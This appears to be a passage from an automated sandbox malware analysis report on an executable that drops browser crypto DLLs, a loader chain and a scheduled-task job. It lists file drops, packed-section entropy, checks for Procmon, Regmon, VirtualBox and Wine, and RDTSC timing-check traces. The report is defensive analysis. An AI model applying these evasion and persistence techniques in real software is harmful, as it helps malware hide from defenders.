Source: Binary string: mozglue.pdbP source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Unpacked PE file: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Unpacked PE file: 7.2.IDGHDGIDAK.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Unpacked PE file: 13.2.528307a0ac.exe.550000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5AC410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explorti.exe.7.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
Source: random[1].exe.12.dr Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: Wf9qnVcbi8.exe Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
Source: 528307a0ac.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: IDGHDGIDAK.exe.0.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .idata
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: lwthcuux
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: rgejpvgu
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: lwthcuux
Source: amadka[1].exe.0.dr Static PE information: section name: rgejpvgu
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: lwthcuux
Source: explorti.exe.7.dr Static PE information: section name: rgejpvgu
Source: explorti.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B536 push ecx; ret 0_2_6C57B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0030D82C push ecx; ret 12_2_0030D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_039D66F9 push cs; retf 13_2_039D66FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_039D61F0 push cs; retf 13_2_039D620B
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2940 push 7F4B0002h; ret 13_2_7F4B294F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2640 push 7F4B0002h; ret 13_2_7F4B264F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0B40 push 7F4B0002h; ret 13_2_7F4B0B4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0E40 push 7F4B0002h; ret 13_2_7F4B0E4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1140 push 7F4B0002h; ret 13_2_7F4B114F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1440 push 7F4B0002h; ret 13_2_7F4B144F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1740 push 7F4B0002h; ret 13_2_7F4B174F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1A40 push 7F4B0002h; ret 13_2_7F4B1A4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1D40 push 7F4B0002h; ret 13_2_7F4B1D4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2040 push 7F4B0002h; ret 13_2_7F4B204F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2340 push 7F4B0002h; ret 13_2_7F4B234F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2850 push 7F4B0002h; ret 13_2_7F4B285F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2550 push 7F4B0002h; ret 13_2_7F4B255F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2250 push 7F4B0002h; ret 13_2_7F4B225F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0A50 push 7F4B0002h; ret 13_2_7F4B0A5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push edx; mov dword ptr [esp], edx 13_2_7F4B0625
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push edx; mov dword ptr [esp], esi 13_2_7F4B0722
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push ebx; mov dword ptr [esp], ebx 13_2_7F4B0756
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0D50 push 7F4B0002h; ret 13_2_7F4B0D5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1050 push 7F4B0002h; ret 13_2_7F4B105F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1350 push 7F4B0002h; ret 13_2_7F4B135F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1650 push 7F4B0002h; ret 13_2_7F4B165F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1950 push 7F4B0002h; ret 13_2_7F4B195F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1C50 push 7F4B0002h; ret 13_2_7F4B1C5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1F50 push 7F4B0002h; ret 13_2_7F4B1F5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2760 push 7F4B0002h; ret 13_2_7F4B276F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0C60 push 7F4B0002h; ret 13_2_7F4B0C6F
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.995078111537249
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.98138192860846
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.951394948256141
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: entropy: 7.982608481536758
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.982608481536758
Source: amadka[1].exe.0.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: explorti.exe.7.dr Static PE information: section name: entropy: 7.982608481536758
Source: explorti.exe.7.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.995078111537249
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.98138192860846
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.951394948256141
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.995078111537249
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.98138192860846
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.951394948256141
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5A55F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91894 second address: C91899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C816F3 second address: C81727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FC9F53DFD56h 0x0000000c popad 0x0000000d jnp 00007FC9F53DFD72h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C90B80 second address: C90B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91164 second address: C91168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91168 second address: C9117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53C6A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FC9F53C6A76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C9117D second address: C91183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C937A5 second address: C937A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938AF second address: C938B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938B7 second address: C938DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9F53C6A89h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938DA second address: C93901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FC9F53DFD56h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93901 second address: C93907 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93907 second address: C9393D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD5Ch 0x00000008 jne 00007FC9F53DFD56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jng 00007FC9F53DFD6Bh 0x00000018 jnl 00007FC9F53DFD65h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C9393D second address: C939A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FC9F53C6A78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000003h 0x00000024 mov cx, 032Dh 0x00000028 push 00000000h 0x0000002a cld 0x0000002b mov edx, eax 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FC9F53C6A78h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 sub dword ptr [ebp+122D1BCFh], edi 0x0000004f call 00007FC9F53C6A79h 0x00000054 pushad 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939A8 second address: C939C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC9F53DFD5Eh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939C3 second address: C939CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939CD second address: C93A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FC9F53DFD69h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edi 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC9F53DFD65h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A13 second address: C93A1D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53C6A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A1D second address: C93A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FC9F53DFD58h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 lea ebx, dword ptr [ebp+124586F0h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A55 second address: C93A5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A5B second address: C93A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A62 second address: C93A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a je 00007FC9F53C6A76h 0x00000010 pop esi 0x00000011 jo 00007FC9F53C6A7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93AC3 second address: C93AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93AC7 second address: C93ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
